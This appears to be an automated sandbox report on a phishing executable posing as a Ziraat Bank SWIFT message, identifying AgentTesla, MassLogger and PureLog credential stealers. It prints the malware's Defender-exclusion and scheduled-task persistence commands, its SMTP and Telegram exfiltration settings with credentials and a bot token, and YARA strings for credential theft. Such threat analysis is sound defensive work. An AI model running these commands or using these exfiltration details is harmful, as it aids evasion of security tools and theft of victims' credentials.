Edit tour

Windows Analysis Report
Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Overview

General Information

Sample name:	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Analysis ID:	1564711
MD5:	fa7dcecb3c5ac81610c93c6b91cda38a
SHA1:	7359e8d92749a87655654a04671239dc7f300af9
SHA256:	3ca1c11c2d4173581e8007b955c912dd1d6abdb1bafe03924aca8cba437df745
Tags:	exegeoTURWormm0yvZiraatBankuser-abuse_ch
Infos:

Detection

AgentTesla, MassLogger RAT, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected AgentTesla

Yara detected MassLogger RAT

Yara detected PureLog Stealer

Yara detected Telegram RAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains very large strings

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Binary is likely a compiled AutoIt script file

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Drops VBS files to the startup folder

Drops executable to a common third party application directory

Infects executable files (exe, dll, sys, html)

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: Use Short Name Path in Command Line

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe (PID: 4812 cmdline: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe" MD5: FA7DCECB3C5AC81610C93C6B91CDA38A)

spadixes.exe (PID: 720 cmdline: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe" MD5: FA7DCECB3C5AC81610C93C6B91CDA38A)

svchost.exe (PID: 5088 cmdline: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

TrojanAI.exe (PID: 6340 cmdline: "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

powershell.exe (PID: 3036 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7524 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 3284 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TrojanAIbot.exe (PID: 7276 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

cmd.exe (PID: 7300 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpA3B8.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7352 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

server02.exe (PID: 6012 cmdline: "C:\Users\user~1\AppData\Local\Temp\server02.exe" MD5: D49B97C9900DA1344E4E8481551CC14C)

neworigin.exe (PID: 520 cmdline: "C:\Users\user~1\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)

armsvc.exe (PID: 4252 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 911868154988B08BC9EC4AF4D85832D3)

TrojanAIbot.exe (PID: 7252 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)

wscript.exe (PID: 7628 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

spadixes.exe (PID: 7684 cmdline: "C:\Users\user\AppData\Local\bothsided\spadixes.exe" MD5: FA7DCECB3C5AC81610C93C6B91CDA38A)

svchost.exe (PID: 7708 cmdline: "C:\Users\user\AppData\Local\bothsided\spadixes.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

spadixes.exe (PID: 7744 cmdline: "C:\Users\user\AppData\Local\bothsided\spadixes.exe" MD5: FA7DCECB3C5AC81610C93C6B91CDA38A)

svchost.exe (PID: 7768 cmdline: "C:\Users\user\AppData\Local\bothsided\spadixes.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

spadixes.exe (PID: 7780 cmdline: "C:\Users\user\AppData\Local\bothsided\spadixes.exe" MD5: FA7DCECB3C5AC81610C93C6B91CDA38A)

svchost.exe (PID: 7812 cmdline: "C:\Users\user\AppData\Local\bothsided\spadixes.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

spadixes.exe (PID: 7828 cmdline: "C:\Users\user\AppData\Local\bothsided\spadixes.exe" MD5: FA7DCECB3C5AC81610C93C6B91CDA38A)

svchost.exe (PID: 7848 cmdline: "C:\Users\user\AppData\Local\bothsided\spadixes.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

TrojanAI.exe (PID: 7952 cmdline: "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

TrojanAIbot.exe (PID: 8132 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7795961032:AAHl2Gyn1IRHeiB38gCoc9MZJfyaE9R5m3s", "Telegram Chatid": "5330396417"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\server02.exe	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
C:\Users\user\AppData\Local\Temp\server02.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\server02.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Temp\server02.exe	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10191:$a1: get_encryptedPassword 0x104cd:$a2: get_encryptedUsername 0xff1e:$a3: get_timePasswordChanged 0x1003f:$a4: get_passwordField 0x101a7:$a5: set_encryptedPassword 0x11b77:$a7: get_logins 0x11828:$a8: GetOutlookPasswords 0x11606:$a9: StartKeylogger 0x11ac7:$a10: KeyLoggerEventArgs 0x11663:$a11: KeyLoggerEventArgsEventHandler
C:\Users\user\AppData\Local\Temp\server02.exe	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1541d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1491b:$a3: \Google\Chrome\User Data\Default\Login Data 0x14c29:$a4: \Orbitum\User Data\Default\Login Data 0x15a21:$a5: \Kometa\User Data\Default\Login Data
C:\Users\user\AppData\Local\Temp\neworigin.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\neworigin.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Local\Temp\neworigin.exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000022.00000003.1483462887.0000000008600000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.1285293466.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 CB 88 44 24 2B 88 44 24 2F B0 9A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000022.00000002.1577778530.0000000005E00000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.1295590843.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 CB 88 44 24 2B 88 44 24 2F B0 9A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000005.00000003.1283416530.0000000008200000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.1328426557.0000000008260000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000002.3712810154.00000000029C4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000002.1427486186.0000000003F20000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 CB 88 44 24 2B 88 44 24 2F B0 9A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000005.00000002.1300865419.0000000005800000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xff91:$a1: get_encryptedPassword 0x102cd:$a2: get_encryptedUsername 0xfd1e:$a3: get_timePasswordChanged 0xfe3f:$a4: get_passwordField 0xffa7:$a5: set_encryptedPassword 0x11977:$a7: get_logins 0x11628:$a8: GetOutlookPasswords 0x11406:$a9: StartKeylogger 0x118c7:$a10: KeyLoggerEventArgs 0x11463:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x1b1aa4:$a20: get_LastAccessed 0x1b541d:$a30: set_GuidMasterKey 0x1b277d:$a31: set_username 0x10c381:$a32: set_version 0x1243b1:$a32: set_version 0x13c3d1:$a32: set_version 0x10b34e:$a33: get_Clipboard 0x12337e:$a33: get_Clipboard 0x13b39e:$a33: get_Clipboard 0x10b395:$a34: get_Keyboard 0x1233c5:$a34: get_Keyboard 0x13b3e5:$a34: get_Keyboard 0x10c5a0:$a35: get_ShiftKeyDown 0x1245d0:$a35: get_ShiftKeyDown 0x13c5f0:$a35: get_ShiftKeyDown 0x1b3de4:$a35: get_ShiftKeyDown 0x1b3df5:$a36: get_AltKeyDown 0x10b3bb:$a37: get_Password 0x1233eb:$a37: get_Password 0x13b40b:$a37: get_Password 0x1b2041:$a37: get_Password
00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10b3f1:$a1: get_encryptedPassword 0x123421:$a1: get_encryptedPassword 0x13b441:$a1: get_encryptedPassword 0x10b72d:$a2: get_encryptedUsername 0x12375d:$a2: get_encryptedUsername 0x13b77d:$a2: get_encryptedUsername 0x10b17e:$a3: get_timePasswordChanged 0x1231ae:$a3: get_timePasswordChanged 0x13b1ce:$a3: get_timePasswordChanged 0x10b29f:$a4: get_passwordField 0x1232cf:$a4: get_passwordField 0x13b2ef:$a4: get_passwordField 0x10b407:$a5: set_encryptedPassword 0x123437:$a5: set_encryptedPassword 0x13b457:$a5: set_encryptedPassword 0x10cdd7:$a7: get_logins 0x124e07:$a7: get_logins 0x13ce27:$a7: get_logins 0x10ca88:$a8: GetOutlookPasswords 0x124ab8:$a8: GetOutlookPasswords 0x13cad8:$a8: GetOutlookPasswords
00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x1b2f93:$s2: GetPrivateProfileString 0x1b25d5:$s3: get_OSFullName 0x10c584:$s5: remove_Key 0x10c61c:$s5: remove_Key 0x1245b4:$s5: remove_Key 0x12464c:$s5: remove_Key 0x13c5d4:$s5: remove_Key 0x13c66c:$s5: remove_Key 0x1b3dc5:$s5: remove_Key 0x1b3f8a:$s5: remove_Key 0x10d2d4:$s6: FtpWebRequest 0x125304:$s6: FtpWebRequest 0x13d324:$s6: FtpWebRequest 0x10f3cc:$s7: logins 0x110933:$s7: logins 0x111402:$s7: logins 0x1273fc:$s7: logins 0x128963:$s7: logins 0x129432:$s7: logins 0x13f41c:$s7: logins 0x140983:$s7: logins
00000022.00000002.1596364234.0000000008B00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001D.00000002.1441006965.0000000003680000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 CB 88 44 24 2B 88 44 24 2F B0 9A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000022.00000002.1574359559.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 CB 88 44 24 2B 88 44 24 2F B0 9A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10b3f1:$a1: get_encryptedPassword 0x123421:$a1: get_encryptedPassword 0x13b441:$a1: get_encryptedPassword 0x10b72d:$a2: get_encryptedUsername 0x12375d:$a2: get_encryptedUsername 0x13b77d:$a2: get_encryptedUsername 0x10b17e:$a3: get_timePasswordChanged 0x1231ae:$a3: get_timePasswordChanged 0x13b1ce:$a3: get_timePasswordChanged 0x10b29f:$a4: get_passwordField 0x1232cf:$a4: get_passwordField 0x13b2ef:$a4: get_passwordField 0x10b407:$a5: set_encryptedPassword 0x123437:$a5: set_encryptedPassword 0x13b457:$a5: set_encryptedPassword 0x10cdd7:$a7: get_logins 0x124e07:$a7: get_logins 0x13ce27:$a7: get_logins 0x10ca88:$a8: GetOutlookPasswords 0x124ab8:$a8: GetOutlookPasswords 0x13cad8:$a8: GetOutlookPasswords
00000022.00000002.1580669736.0000000007205000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.1329059100.0000000008400000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000021.00000002.1489110172.00000000035A0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 CB 88 44 24 2B 88 44 24 2F B0 9A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000022.00000002.1596182253.0000000008640000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001F.00000002.1452830281.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 CB 88 44 24 2B 88 44 24 2F B0 9A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
Process Memory Space: svchost.exe PID: 5088	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: svchost.exe PID: 5088	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
